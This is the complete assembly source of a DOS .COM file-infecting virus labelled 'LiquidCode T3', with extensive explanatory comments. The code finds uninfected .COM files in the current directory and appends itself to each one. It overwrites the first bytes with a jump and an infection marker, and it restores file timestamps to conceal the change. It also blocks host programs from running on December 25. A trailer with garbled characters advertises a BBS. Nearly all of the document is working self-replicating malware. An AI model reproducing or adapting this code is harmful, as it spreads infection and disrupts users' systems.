
;LiquidCode --- T3
;
; Virus
;This version:
;Searches the current directory for non-infected .COM files; if any are found,
;they will be infected!
;This virus also has a routine that removes itself from the host and
;disinfects the file.
assume cs:code ;MASM/TASM syntax (not NASM); only cs is assumed, the code relies on ds=es=cs as DOS sets up for a .COM
.286 ;needed for pusha/popa and push imm16 used below
code segment "code"
org 0100h ;.COM image: code starts right after the 256-byte PSP
start proc
; Entry of the carrier / infected host. In an infected .COM the first
; 5 bytes are E9 xx xx "<T" (see nw_5 and mrk in the data bank), so
; execution lands at v_start in the body appended at the old end of file.
; Register roles for the whole body: bp = runtime address of v_start
; (relocation base); every data item is reached as bp + <offset equate>.
jmp v_start ;first 5 bytes | (3-byte near jmp + 2 nops = 5 bytes,
nop ; | the same length as the head saved in
nop ; | _fstfive and overwritten on infection)
v_start:
call $+3 ;Actual virus: pushes the address of the next instruction
pop dx ;dx = address of this pop
sub dx, 3 ;dx = address of v_start (the call is 3 bytes long)
push dx ;save relocation factor in BP
pop bp ;so virus can be copied anywhere towards
mov si, dx ;the end of the file
;
; Replace first 5 bytes in memory with original
; program code so normal program can run later
add si, first_five ;si = saved original head of the host (5 bytes)
mov di, 0100h ;di = start of the program image
mov cx, 5
lodsb
stosb
loop $-2 ;byte copy loop; $-2 is the lodsb above
;see if user want to disinfect this file
; (disabled: with this check commented out, self_kill is unreachable)
; mov si, 82h
; lodsb
; cmp al, "[" ;is al the code to disinfect? "["
; jne ok_dont_disinfect
; jmp self_kill
ok_dont_disinfect:
;here should be date checks to see
;if an evil function should be unleashed!!
mov ah, 2ah ;DOS: get system date
int 21h
;cx year 1980-2099
;dh month 1-12
;dl day
;al day of week 0=sun 1=mon -> 6=sat
cmp dh, 12 ;trigger date: December 25 -> CHRISTMAS (host never runs)
jne notdec
cmp dl, 25
jne notdec
jmp christmas
notdec:
cmp dh, 4 ;April 1 is tested but its jump is commented out
jne notapril
cmp dl, 1
jne notapril
; jmp aprilfools
notapril:
;Set the DTA
call set_dta ;DTA = d_t_a inside the body
;find first file to ?infect?
call find_first_file ;"*.COM" in the current directory; exits to host on failure
go_again:
mov si, bp
add si, size_ ;si = file size field of the DTA
lodsw ;ax = low word of the size only
cmp ax, 5 ;must at least hold a 5-byte head
ja gd4
jmp resrch ;too small -> next file
gd4:
call open_file ;open read/write; handle stored at [bp+handle]
mov bx, ax ;bx = handle for the DOS calls below
mov al, 0
call date_time ;al=0: save the file's date/time stamp
mov ah, 3fh ;DOS: read cx=5 bytes into ds:dx
mov cx, 5
mov dx, bp
add dx, first_five ;keep the candidate's original head
int 21h
;**** mov ax, 4202h
mov cx, 0
mov ax, 4202h ;DOS: lseek to end (cx:dx = 0) -> dx:ax = file size
mov dx, cx
int 21h
sub ax, 3 ;displacement for a near jmp at 0100h to the appended body
mov si, bp
add si, new_5
mov [si+1], ax ;patch the 16-bit displacement of E9 xx xx
mov si, bp
mov di, si
add si, chkmark ;bytes 3..4 of the head just read
add di, mark ;"<T" infection marker
mov cx, 2
repe cmpsb
jne INFECT
;File found was previously infected!
; search for new one now.
jmp resrch
wipe_name:
; Zero the 13-byte filename field (n_me) of the DTA so the body written
; into a victim carries no filename. Preserves di, ax and cx.
push di
push ax
push cx
mov di, bp
add di, name_
mov cx, 13
mov al, 0
rep stosb ;es:di <- 13 zero bytes
pop cx
pop ax
pop di
ret
resrch:
; Advance to the next "*.COM" match; when none is left, run the host.
call wipe_name
mov ah, 4fh ;DOS: find next (uses the DTA set by set_dta)
int 21h
jnc gd3
jmp term_virus ;no more files -> hand control to the host
gd3:
jmp go_again
INFECT:
;Time to infect the file!!
; Resulting file layout: [5-byte jmp head][rest of original host]
; [body v_start..end___]. The appended copy carries first_five (the
; host's real head), which the entry code restores at run time.
mov si, bp
add si, handle
mov bx, [si] ;bx = open handle of the victim
mov cx, vsize ;bytes from v_start to end___
mov dx, bp ;ds:dx = v_start, the running body itself
call wipe_name
mov ax, 4000h ;DOS: write; the position is still EOF from the lseek in gd4
int 21h
mov ax, 4200h ;DOS: lseek to offset 0
mov cx, 0
mov dx, cx
int 21h
mov dx, bp
add dx, new_5 ;E9 lo hi followed by "<T" from mrk
mov ax, 4000h ;DOS: write the 5-byte head
mov cx, 5
int 21h
mov al, 1
call date_time ;al=1: put the saved date/time stamp back on the file
mov ax, 3e00h ;DOS: close handle
int 21h
jmp resrch
fndnam proc
; Locate the running program's pathname in the DOS environment block.
; In:  ds = cs (PSP at offset 0)
; Out: ds = es = environment segment, dx = di = offset of the pathname
; Clobbers ax, si; cx is consumed by the final repne scasb.
; The stosb instructions write every byte back to the place it was read
; from (di tracks si one byte behind), so the loops only scan.
mov si, env ;PSP+2Ch holds the environment segment (env is defined below)
mov ax, [si]
mov es, ax
mov ds, ax
mov si, 0
mov di, si
__lp:
lodsb ;scan the "VAR=value",0 strings
cmp al, 0
je chknxt
stosb
jmp __lp
chknxt:
stosb
lodsb
cmp al, 0 ;second 0 in a row = end of the environment strings
je fnd1
stosb
jmp __lp
fnd1:
stosb
__lp2:
lodsb ;skip non-letter bytes (the word after the terminator) up to the first letter of the pathname
cmp al, "a"
jae ff_
up2:
cmp al, "A"
jae fff_
up3:
stosb
jmp __lp2
ff_:
cmp al,"z"
jbe fnd ;'a'..'z'
jmp up2
fff_:
cmp al, "Z"
jbe fnd ;'A'..'Z'
jmp up3
fnd:
mov si, di ;di = address of the first letter (one behind si after lodsb)
mov al, 0
repne scasb ;NOTE(review): cx is not set in this routine; the scan count is whatever the caller left in cx
mov dx, si
mov di, dx
ret
env equ 2ch ;PSP offset of the environment segment word
fndnam endp
self_kill:
;this procedure disinfects the currently running file
;fndnam returns ds:dx = name of the current file on disk
;which is infected
; Unreachable in this build: the only jump here (after the "[" check
; in start) is commented out.
call fndnam ;find name of current file from env block in memory
jmp gd__
abrt:
int 20h ;any failure: terminate without running the host
gd__:
mov ax, 3d02h ;DOS: open ds:dx (pathname in the environment) read/write
int 21h
jc abrt
mov bx, ax ;bx = handle
mov ax, cs ;restore ds/es after fndnam switched them to the env segment
mov ds, ax
mov es, ax
mov cx, 5
mov dx, bp
add dx, first_five ;the saved original head
call wipe_name
mov ax, 4000h ;DOS: write 5 bytes at offset 0 (position after open)
int 21h
jc abrt
mov dx, 0
mov cx, 0
mov ax, 4202h ;DOS: lseek to end -> ax = size (low word)
int 21h
jnc gd__1
jmp abrt
gd__1:
sub ax, vsize ;offset where the appended body starts
mov dx, ax
mov cx, 0
mov ax, 4200h ;DOS: lseek to that offset
int 21h
call wipe_name
mov cx, 0
mov ax, 4000h ;DOS: write with cx=0 truncates the file at the current position
int 21h
mov ax, 3e00h ;DOS: close
int 21h
jmp term_virus ;then run the host image already restored in memory
date_time:
; Get or set the date/time stamp of file handle bx (DOS fn 57h).
; In:  al = 0  -> read the stamp into [bp+time] / [bp+date]
;      al <> 0 -> write the stored stamp back (callers pass 1)
;      bx = open file handle
; All registers are preserved (pusha/popa).
pusha
mov ah, 57h
cmp al, 0
je fnd__$
mov di, bp
mov si, di
add di, date
add si, time
mov dx, [di] ;set: dx = date, cx = time
mov cx, [si]
int 21h
jmp ret__
fnd__$:
int 21h ;get: returns cx = time, dx = date
mov si, bp
mov di, bp
add si, time
add di, date
mov [si], cx
mov [di], dx
ret__:
popa
ret
open_file:
; Open the file named in the DTA (n_me); on failure control goes to the host.
; Out: ax = handle, also stored at [bp+handle].
mov dx, bp
add dx, name_
mov ax, 3d02h ;DOS: open, access mode 2 = read/write
int 21h
jnc gd2
jmp term_virus
gd2:
mov si, bp
add si, handle
mov [si], ax
ret
find_first_file:
; DOS find-first for "*.COM" (attribute mask cx=0); the match is written
; to the DTA. If nothing matches, control goes to the host.
mov dx, bp
mov cx, 0
mov ah, 4eh ;DOS: find first matching file
add dx, all_com_files
int 21h
jnc gd1
jmp term_virus
gd1:
ret
set_dta:
; Point the DOS Disk Transfer Area at d_t_a inside the body, so that
; find-first/next fill the fields read through the size_/name_ equates.
mov dx, bp
mov ah, 1ah ;DOS: set DTA address to ds:dx
add dx, dta
int 21h
ret
term_virus:
; Hand control to the host: ax..dx are zeroed, si/di/bp are preset
; (presumably to mimic the register state a freshly loaded .COM sees),
; then a pushed 0100h is "returned" to, where the entry code already
; restored the host's original first 5 bytes.
mov ax, 0
mov bx, ax
mov cx, bx
mov dx, cx
mov si, 0100h
mov di, -1
mov bp, di
push 0100h ;push imm16 (186+), hence .286
ret ;jump to 0100h
CHRISTMAS:
;Program Lockup
; Exit without running program
; Reached from start on December 25: the host never executes that day.
int 20h ;DOS: terminate program
;APRILFOOLS:
;Ha Ha delete current file
; (disabled: the label, its body and the jump in start are all commented out)
; call fndnam
; mov ah, 41h
; int 21h
; mov ax, cs
; mov ds, ax
; mov es, ax
; jmp term_virus
; Data Bank
; Everything here travels with the body and is addressed as bp + equate.
_fstfive:
int 20h ;saved original first 5 bytes of the host; in generation 0
nop ;this is plain "terminate" (CD 20 90 90 90)
ckmrk:
nop ;bytes 3..4 of the head read from a candidate file,
nop ;compared against mrk to recognise an existing infection
acf db "*.COM",0 ;find-first pattern
dt_ dw 0 ;saved file date
tme dw 0 ;saved file time
d_t_a: ;DOS DTA layout filled by find-first/next:
rfd db 21 dup (0) ; 21 reserved bytes
att db 0 ; attribute
dw 0 ; file time
dw 0 ; file date
sz dd 0 ; file size (only the low word is read in go_again)
n_me db 13 dup (0),0 ; ASCIIZ filename, zeroed by wipe_name
handl dw 0 ;handle of the file being processed
nw_5 db 0e9h,0,0 ;new head: near jmp, displacement patched in gd4; the
mrk db "<T3> " ;5-byte head write continues into "<T" here = infection marker
strain db "<tm>LiquidCode 92" ;author tag; present in every infected file, as is mrk
;
end___:
; Offsets relative to v_start (0105h): bp + X is the runtime address of
; item X wherever the body has been relocated to.
first_five = offset _fstfive-0105h
all_com_files = offset acf-0105h
dta = offset d_t_a-0105h
attribute = offset att-0105h
time = offset tme-0105h
date = offset dt_-0105h
size_ = offset sz-0105h
name_ = offset n_me-0105h
handle = offset handl-0105h
new_5 = offset nw_5-0105h
mark = offset mrk-0105h
chkmark = offset ckmrk-0105h
vsize = offset end___-0105h ;length of the appended body (v_start..end___)
start endp
code ends
end start

; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>